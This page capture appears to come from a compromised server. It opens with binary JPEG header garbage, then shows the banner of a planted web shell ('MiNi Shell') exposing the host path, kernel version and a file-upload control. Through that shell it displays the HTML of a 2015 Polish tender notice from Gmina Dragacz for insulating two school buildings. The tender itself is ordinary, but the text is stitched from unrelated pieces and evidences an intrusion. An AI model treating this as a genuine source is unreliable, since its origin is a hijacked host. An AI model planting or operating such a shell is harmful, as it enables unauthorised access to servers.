JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150327/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20150327/43641-N-2015.html

<p class="kh_header"><b>Dragacz: Docieplenie ścian i stropów budynków dwóch szkół w Grupie i Michalu na terenie gm. Dragacz</b><br>
<b>Numer ogłoszenia: 43641 - 2015; data zamieszczenia: 27.03.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wójt Gminy Dragacz , Dragacz 7A, 86-134 Dragacz, woj. kujawsko-pomorskie, tel. 52 332 49 69, faks 52 332 49 74.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> bip.dragacz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Docieplenie ścian i stropów budynków dwóch szkół w Grupie i Michalu na terenie gm. Dragacz.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Docieplenie ścian i stropów budynków dwóch szkół w Grupie i Michalu na terenie gm. Dragacz.
CZĘŚĆ 1: obejmująca wykonanie robót budowlanych związanych z zadaniem pn.: Docieplenie ścian  i stropów budynków Szkoły Podstawowej w Grupie, gm. Dragacz,  łączna pow.  ścian i stropów: 2.203 m2 ,  wys. budynku (bud. szkoły: 12,20  m, łącznik: 5,20 m, sala gimnastyczna 7,25 m), kubatura: 11,560,94 m3 . Zakres przedmiotu zamówienia dla CZĘŚĆ 1: 
- demontaż i zmagazynowanie elementów zewnętrznych przeznaczonych do ponownego wykorzystania,
- demontaż elementów zewnętrznych nie nadających się do ponownego wykorzystania,
- wykonanie izolacji termicznej cokołu aż do poziomu ław fundamentowych budynku za pomocą hydro-styropianu  gr. 10cm  EPS 100 lamda max= 0,040 W na m K,
- wykonanie izolacji termicznej ścian zewnętrznych budynku za pomocą styropianu gr. 15cm  EPS 70 lamda max= 0,040 W na m K wraz z wykonaniem faktury i powłok malarskich wg kolorystyki elewacji,
- wykonanie izolacji termicznej ościeży  budynku za pomocą styropianu gr. 2cm  EPS 70 lamda max= 0,040 W na m K,
- wykonania docieplenia stropodachu niewentylowanego przy pomocy płyt styropapy EPS 100 gr. 18cm lamda max= 0,036 W na m K,
- wykonania docieplenia stropodachu wentylowanego przy pomocy granulatu celulozowego gr. 18cm lamda max= 0,039 W na m K,
- wykonanie nowego pokrycia dachowego dla stropodachu niewentylowanego,
- wykonanie jednej warstwy nawierzchniowej papy dla stropodachu wentylowanego, 
- wykonanie nowych obróbek blacharskich oraz montaż obróbek nadających się do ponownego wykorzystania,
- roboty malarskie wewnętrzne,
- roboty elektryczne instalacyjne, w tym wymiana instalacji odgromowej,
- przemurowanie kominów,
- wymiana kratek wentylacyjnych,
- oczyszczenie i pomalowanie barierek stalowych,
- oczyszczenie i pomalowanie kominków wentylacyjnych na dachu,
- wykonania remontu zadaszeń nad wejściami,
-  montaż i demontaż rusztowania,
- pozostałe roboty wymagane do prawidłowego zakończenia zamierzenia inwestycyjnego.
Podstawowe wymiary:  
Wysokość od poziomu terenu do wierzchu dachu:
- budynek główny ca 12,20 m
- łącznik ca 5,20 m
- sala gimnastyczna ca 7,25 m
Powierzchnia zabudowy: 1199,15 m2
Kubatura budynku ca. 11560.94 m3
Uszczegółowienie przedmiotu zamówienia  opisano w zał. nr 1 do SIWZ - Opis przedmiotu zamówienia oraz w zał. Nr 3. Dokumentacja projektowa (z przedmiarem robót załączonym pomocniczo, specyfikacją techniczną wykonania i odbioru robót budowlanych oraz projektem budowlanym.
CZĘŚĆ 2: obejmująca wykonanie robót budowlanych związanych z zadaniem pn.: Docieplenie ścian i stropów budynku Gimnazjum w Michalu, gm. Dragacz:, łączna pow. ścian i stropów: 2.478,50 m2, wys. budynku (bud. szkoły: 8,40 m, łącznik: 4,20 m, sala gimnastyczna 9,50 m), kubatura: 9.223.20 m3. Zakres przedmiotu zamówienia dla  CZĘŚĆ 2: 
- demontaż i zmagazynowanie elementów zewnętrznych przeznaczonych do ponownego wykorzystania,
- demontaż elementów zewnętrznych nie nadających się do ponownego wykorzystania,
- wykonanie izolacji termicznej cokołu budynku za pomocą styropianu gr. 10cm  EPS 100 lamda max= 0,040 W na m  K,
- wykonanie izolacji termicznej ścian zewnętrznych budynku za pomocą styropianu gr. 15cm i 12cm EPS 70 lamda max= 0,040 W na m K wraz z wykonaniem faktury i powłok malarskich wg kolorystyki elewacji,
- wykonanie izolacji termicznej ościeży budynku za pomocą styropianu gr. 2cm  EPS 70 lamda max= 0,040 W na m K,
- wykonanie izolacji termicznej gzymsu  budynku za pomocą styropianu gr. 5cm  EPS 70 lamda max= 0,040 W na m K,
- wykonania docieplenia stropodachu niewentylowanego przy pomocy płyt styropapy EPS 100 gr. 18cm lamda max= 0,036 W na m K,
- wykonania docieplenia stropodachu wentylowanego przy pomocy granulatu celulozowego gr. 18cm lamda max= 0,039 W na m K,
- wykonanie nowego pokrycia dachowego dla stropodachu niewentylowanego
- wykonanie nowych obróbek blacharskich oraz montaż obróbek nadających się do ponownego wykorzystania,
- wzmocnienie rys i pęknięć konstrukcyjnych,
- roboty malarskie wewnętrzne,
- wymianie luksferów nad wejściem głównym do budynku,
- roboty elektryczne instalacyjne  - w tym wymiana instalacji odgromowej,
-  montaż i demontaż rusztowania,
- pozostałe roboty wymagane do prawidłowego zakończenia zamierzenia inwestycyjnego.
Podstawowe wymiary:  
Wysokość od poziomu terenu do wierzchu attyki: 
- główny gmach szkoły - 8,40m
- łącznik - 4,20m 
- sala gimnastyczna - 9,50m
Powierzchnia zabudowy: 1347,0m2
Kubatura budynku ca. 9223,2m3.
Uszczegółowienie przedmiotu zamówienia  opisano w zał. nr 1 do SIWZ - Opis przedmiotu zamówienia oraz w zał. Nr 3.1 Dokumentacja projektowa (z przedmiarem robót załączonym pomocniczo, specyfikacją techniczną wykonania i odbioru robót budowlanych oraz projektem budowlanym.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.32.10.00-3, 45.44.30.00-4, 45.44.21.00-8, 45.31.00.00-3, 45.11.13.00-1, 45.26.21.00-2, 45.26.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 28.08.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający żąda wniesienia wadium przetargowego osobno dla każdej z dwóch części przedmiotu zamówienia w wysokości po 5.000,00 zł każde</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje opisu w tym zakresie, a oceny spełnienia tego warunku dokona na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu o udzielenie zamówienia publicznego przy zastosowaniu formuły: spełnia / nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek udziału w postępowaniu zostanie uznany za spełniony jeżeli Wykonawca potwierdzi  doświadczenie w wykonaniu, w okresie ostatnich 5 lat przed dniem wszczęcia postępowania  o udzielenie zamówienia publicznego, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie tj.: dla CZĘŚCI 1: zadanie pn.: Docieplenie ścian  i stropów budynków Szkoły Podstawowej  w Grupie, gm. Dragaczco najmniej 1 roboty budowlanej odpowiadającej swoim rodzajem (np.: docieplenie ścian i stropów budynku o łącznej pow. docieplenia: min. 2000 m2, wys. budynku powyżej 12 m  i wartością (min. 500.000 zł. brutto), dla CZĘŚCI 2: zadanie pn.: Docieplenie ścian i stropów budynku Gimnazjum w Michalu, gm. Dragacz, co najmniej 1 roboty budowlanej odpowiadającej swoim rodzajem (np.: docieplenie ścian i stropów budynku o łącznej pow. docieplenia: min. 2400 m2) i wartością (min. 450.000 zł. brutto) robotom budowlanym, stanowiącym przedmiot zamówienia. Oceny spełnienia tego warunku Zamawiający dokona na podstawie załączonych do oferty: oświadczeń,dokumentów i poświadczeń przy zastosowaniu formuły: spełnia / nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje opisu w tym zakresie, a oceny spełnienia tego warunku dokona na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu o udzielenie zamówienia publicznego przy zastosowaniu formuły: spełnia / nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek udziału w postępowaniu zostanie uznany za spełniony jeżeli Wykonawca potwierdzi dysponowanie osobami, które posiadają uprawnienia budowlane do pełnienia funkcji kierownika budowy w specjalności konstrukcyjno - budowlanej (minimum 1 osoba) i specjalności elektrycznej w specjalności sieci, instalacje i urządzenia elektryczne i energetyczne (minimum 1 osoba) - dotyczy CZĘŚCI 1: zadanie pn.:Docieplenie ścian  i stropów budynków Szkoły Podstawowej w Grupie, gm. Dragacz. Oceny spełnienia tego warunku Zamawiający dokona na podstawie załączonych do oferty: oświadczeń,dokumentów i poświadczeń przy zastosowaniu formuły: spełnia / nie spełnia. Dla CZĘŚCI 2: zadanie pn.: Docieplenie ścian i stropów budynku Gimnazjum w Michalu, gm. Dragacz, Zamawiający nie precyzuje szczegółowego warunku w tym zakresie,  a spełnienie tego warunku oceni na podstawie złożonego przez wykonawcę oświadczenia o spełnieniu warunków udziału w postępowaniu i oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje opisu w tym zakresie, a oceny spełnienia tego warunku dokona na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu o udzielenie zamówienia publicznego przy zastosowaniu formuły: spełnia / nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>formularz ofertowy; dowód potwierdzający wniesienie wadium; oświadczenie o spełnieniu warunków udziału w postępowaniu o udzielenie zamówienia publicznego, o których mowa w art. 22 ust.1 i art. 44 ustawy Prawo zamówień publicznych; pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia; dokumenty wymagane przy składaniu oferty wspólnej ( np.: pełnomocnictwo)</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Gwarnacja jakości - 5</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmiany postanowień zawartej umowy w następujących przypadkach:
1) termin wykonania przedmiotu zamówienia może ulec zmianie w przypadku wystąpienia sytuacji niemożliwych do przewidzenia w chwili zawarcia umowy, takich jak:
a) z powodu nie przewidzianego braku płynności finansowej u Zamawiającego,
b) wystąpienie różnego rodzaju klęsk żywiołowych, epidemii, operacji wojennych, strajku generalnego, 
c) działania siły wyższej - w szczególności: zdarzenia zewnętrznego, niemożliwego do przewidzenia  i niemożliwego do zapobieżenia, w tym katastrofalne działania przyrody, akty władzy ustawodawczej  i wykonawczej,  oraz niektóre zaburzenia życia zbiorowego, jak również wyjątkowo niepomyślnych warunków pogodowych, temperatur otoczenia niepozwalających na zachowanie ustalonego terminu wykonania przedmiotu zamówienia,
d) działania osób trzecich, w szczególności uniemożliwiające wykonywanie usługi, które to działania nie są konsekwencją winy którejkolwiek ze stron, 
e) konieczności wykonania zamówień dodatkowych, uniemożliwiających wykonanie zamówienia podstawowego,
f) wystąpienia nie zinwentaryzowanych urządzeń podziemnych, kolizji, wysokiego  poziomu wód gruntowych w miejscach nie przewidzianych,
2) w przypadku zmiany kluczowego personelu Wykonawcy,
3) w przypadku zmiany podwykonawcy, o ile Wykonawca powierzył wykonanie części zamówienia podwykonawcy,
4) w przypadku zmiany stawki podatku VAT</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.dragacz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Dragacz, Dragacz 7A, 86 - 134 Dragacz, pok. nr 7.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.04.2015 godzina 12:00, miejsce: Urząd Gminy Dragacz, Dragacz 7A, 86 - 134 Dragacz, pok. nr 4 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Docieplenie ścian i stropów budynków dwóch szkół w Grupie i Michalu na terenie gm. Dragacz.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> CZĘŚĆ 1: obejmująca wykonanie robót budowlanych związanych z zadaniem pn.: Docieplenie ścian  i stropów budynków Szkoły Podstawowej w Grupie, gm. Dragacz,  łączna pow.  ścian i stropów: 2.203 m2 ,  wys. budynku (bud. szkoły: 12,20  m, łącznik: 5,20 m, sala gimnastyczna 7,25 m), kubatura: 11,560,94 m3. Zakres przedmiotu zamówienia dla CZĘŚĆ 1: 
- demontaż i zmagazynowanie elementów zewnętrznych przeznaczonych do ponownego wykorzystania,
- demontaż elementów zewnętrznych nie nadających się do ponownego wykorzystania,
- wykonanie izolacji termicznej cokołu aż do poziomu ław fundamentowych budynku za pomocą hydro-styropianu  gr. 10cm  EPS 100 lamda max= 0,040 W na m K,
- wykonanie izolacji termicznej ścian zewnętrznych budynku za pomocą styropianu gr. 15cm  EPS 70 lamda max= 0,040 W na m K wraz z wykonaniem faktury i powłok malarskich wg kolorystyki elewacji,
- wykonanie izolacji termicznej ościeży  budynku za pomocą styropianu gr. 2cm  EPS 70 lamda max= 0,040 W na m K,
- wykonania docieplenia stropodachu niewentylowanego przy pomocy płyt styropapy EPS 100 gr. 18cm lamda max= 0,036 W na m K,
- wykonania docieplenia stropodachu wentylowanego przy pomocy granulatu celulozowego gr. 18cm lamda max= 0,039 W na m K,
- wykonanie nowego pokrycia dachowego dla stropodachu niewentylowanego,
- wykonanie jednej warstwy nawierzchniowej papy dla stropodachu wentylowanego, 
- wykonanie nowych obróbek blacharskich oraz montaż obróbek nadających się do ponownego wykorzystania,
- roboty malarskie wewnętrzne,
- roboty elektryczne instalacyjne, w tym wymiana instalacji odgromowej,
- przemurowanie kominów,
- wymiana kratek wentylacyjnych,
- oczyszczenie i pomalowanie barierek stalowych,
- oczyszczenie i pomalowanie kominków wentylacyjnych na dachu,
- wykonania remontu zadaszeń nad wejściami,
-  montaż i demontaż rusztowania,
- pozostałe roboty wymagane do prawidłowego zakończenia zamierzenia inwestycyjnego.
Podstawowe wymiary:  
Wysokość od poziomu terenu do wierzchu dachu:
- budynek główny ca 12,20 m
- łącznik ca 5,20 m
- sala gimnastyczna ca 7,25 m
Powierzchnia zabudowy: 1199,15 m2
Kubatura budynku ca. 11560.94 m3.
Uszczegółowienie przedmiotu zamówienia  opisano w zał. nr 1 do SIWZ - Opis przedmiotu zamówienia oraz w zał. Nr 3. Dokumentacja projektowa (z przedmiarem robót załączonym pomocniczo, specyfikacją techniczną wykonania i odbioru robót budowlanych oraz projektem budowlanym.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.32.10.00-3, 45.44.21.00-8, 45.44.30.00-4, 45.31.00.00-3, 45.11.13.00-1, 45.26.21.00-2, 45.26.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.08.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Gwarancja jakosci - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Docieplenie ścian i stropów budynków dwóch szkół w Grupie i Michalu na terenie gm. Dragacz.</p>
